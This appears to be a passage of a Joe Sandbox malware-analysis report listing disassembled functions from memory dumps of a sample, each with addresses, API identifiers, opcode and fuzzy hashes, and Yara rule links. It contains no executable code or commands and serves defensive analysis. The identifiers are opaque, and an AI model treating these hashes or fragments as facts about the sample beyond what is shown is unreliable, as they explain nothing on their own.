                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: Z81xbyuAua
                                                                                                                                                                                                                      • API String ID: 0-3121583705
                                                                                                                                                                                                                      • Opcode ID: 13760622eb8db6dd5d4f235c0a8f2c0750dcfedb6f8e13509ec9c1bf74431a09
                                                                                                                                                                                                                      • Instruction ID: 0c9252a36476fa0165c88b1fea8e945042d0037b43949469cac6823add885d37
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13760622eb8db6dd5d4f235c0a8f2c0750dcfedb6f8e13509ec9c1bf74431a09
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A412D76D105275BCB4CEEB8C4551EFBBA5DB46310B044279DE11DF3D1E234CA4286D4
                                                                                                                                                                                                                      Function 0062A4E7 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                                                                      • Opcode ID: 79b0f2d8c0474b0b6034bb163a45a459d1a391980fa8c2389a87d671fd987ce1
                                                                                                                                                                                                                      • Instruction ID: 3e4a853f0bcc2aea36b3cc2a102dcb7099ff22cfd1ccaf3b7171be01ddb7578a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79b0f2d8c0474b0b6034bb163a45a459d1a391980fa8c2389a87d671fd987ce1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66A011302022008BA3208F30AF0E2083AEEAA8AA80300203AA008C0820EA3880208A82
                                                                                                                                                                                                                      Function 00664C06 Relevance: .5, Instructions: 489COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 14914ce319192a20c47738cfe0a9ee2becf76adafd29083199ce06f06434a77c
                                                                                                                                                                                                                      • Instruction ID: 96bcc620538acf0f8265c5d746fd4bfb925051e717837f7941962f3668b66a38
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14914ce319192a20c47738cfe0a9ee2becf76adafd29083199ce06f06434a77c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B402D733D496F28B8F754EB944D02A67FA26E01B4031F46E9DED03F29AC613DD1696E0
                                                                                                                                                                                                                      Function 00665BF3 Relevance: .4, Instructions: 355COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                      • Instruction ID: 1cf51875a04c314ed3716bbcf64e5276e1137e1c34c3567da3b68cec45a452db
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41C18C73D0ADF2498B36863E441927AEFA36F81B4171F8395DCD13F289D623AE0196D0
                                                                                                                                                                                                                      Function 0066580B Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                                      • Instruction ID: adb11c5af0447c6f57d8a86920c573b2e19a3f844861f791048fcc4ae0d2e111
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63C17B33D0A9F2498B36863E44592BAEFA36F91B4171F8395DCD13F289D623AD0196D0
                                                                                                                                                                                                                      Function 00665439 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                      • Instruction ID: 50341b1126a710826d241bef76fd9381c4c2273111a826c7694dffe94f9f72cc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2C16D73D0A9F2498B36823D84192BAEFA36F91B4171BC395CCD13F289D627AD05D6D0
                                                                                                                                                                                                                      Function 006293D2 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3471368781-0
                                                                                                                                                                                                                      • Opcode ID: 6398637b58d031c9e0188c95a60afef8b699655eea1827d299a5043c676489ae
                                                                                                                                                                                                                      • Instruction ID: 44ce324ea11cfee162a6b494a7634522bbf5a5d0d57398ba56f96099534c062f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6398637b58d031c9e0188c95a60afef8b699655eea1827d299a5043c676489ae
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74B10B35500B158BDB389F25EC92BF7B3EAEF94308F14452DE983C6640EA75A985CF20
                                                                                                                                                                                                                      Function 0066509B Relevance: .3, Instructions: 326COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                                      • Instruction ID: 58e83760fb30f8d9f2dae028d90843ab5483830890fdda8d986e1178a7fe7b49
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5B19F33D1A9F2468B35863D445927AEFA36F81B4172EC391CCD13F389D623AE0196D0
                                                                                                                                                                                                                      Function 006535EA Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f820d73acb58f4ea73768fd8ccb48802642c53090ea72760e35e0388eb771fac
                                                                                                                                                                                                                      • Instruction ID: 5b041e40a4462c002bc93030f962e261187ace5508132b56b9ea18de739b2564
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f820d73acb58f4ea73768fd8ccb48802642c53090ea72760e35e0388eb771fac
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3921EB21674AF316CB848FF9FCD0152A7D1CBCD21BB5EC279CE50C9266D06DE6228590
                                                                                                                                                                                                                      Function 00639076 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 0a02b5de02fe1c5233129e4520291547e8b9274d16aa9eef7f34f516a3dff107
                                                                                                                                                                                                                      • Instruction ID: b527fe052c89e74973a42469d27e52c192ef037fedb72a241d07ffe4442ff15a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a02b5de02fe1c5233129e4520291547e8b9274d16aa9eef7f34f516a3dff107
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE215FB5D0021A8FCB54CFA9D4816EEFBF4BB48320F54846EC956B3350E634AA458F94
                                                                                                                                                                                                                      Function 00639385 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                                                                                                                      • Instruction ID: 63ae75f937b20ff60b5642c2907e8b6a8b01180fe9263ec7b45b9961b40c2d53
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AF0F876A04514ABDB21CF59D804AAAFBBAEB47760F253054E409B3650C374EE11AEA8
                                                                                                                                                                                                                      Function 00627EE8 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 5566999e0ab72da053a8abcc3324ddc8aa4becb6fcadd465fa76c36a84b4dcdd
                                                                                                                                                                                                                      • Instruction ID: 35b93fd8a1e5cb227e5d15a8d5c7377c53f893a43ff8787a8901f9e5ab93a24c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5566999e0ab72da053a8abcc3324ddc8aa4becb6fcadd465fa76c36a84b4dcdd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2CE08C72919638EBCB14DB88DA04E8AF3EDEB45B10F15089AF501D3210C270DE00CBD0
                                                                                                                                                                                                                      Function 00650472 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                                                      • Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50
                                                                                                                                                                                                                      Function 0061208F Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 36ee60ac244e19e894879db150e4a877eeafaa5209d97bbfc198eca8377c3515
                                                                                                                                                                                                                      • Instruction ID: a075c0edec25dbe1a682ce445492b8fbcfcc92255e0ce4b041d7801e746d56fb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36ee60ac244e19e894879db150e4a877eeafaa5209d97bbfc198eca8377c3515
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4D0953A605A509FC310CF0AE440945F7B9FB99A30B1682A6E905A3B20C334FC02CAE0
                                                                                                                                                                                                                      Function 0061EE9C Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a143222fbadcdda3babb2bd23adbde204d1ca1d3ff22d9f4b52ceee6d3db84ec
                                                                                                                                                                                                                      • Instruction ID: 8633b6ecb3f4207bcba4e8ebac2da71898ef8bee2188e04957f85f2c9e4c1036
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a143222fbadcdda3babb2bd23adbde204d1ca1d3ff22d9f4b52ceee6d3db84ec
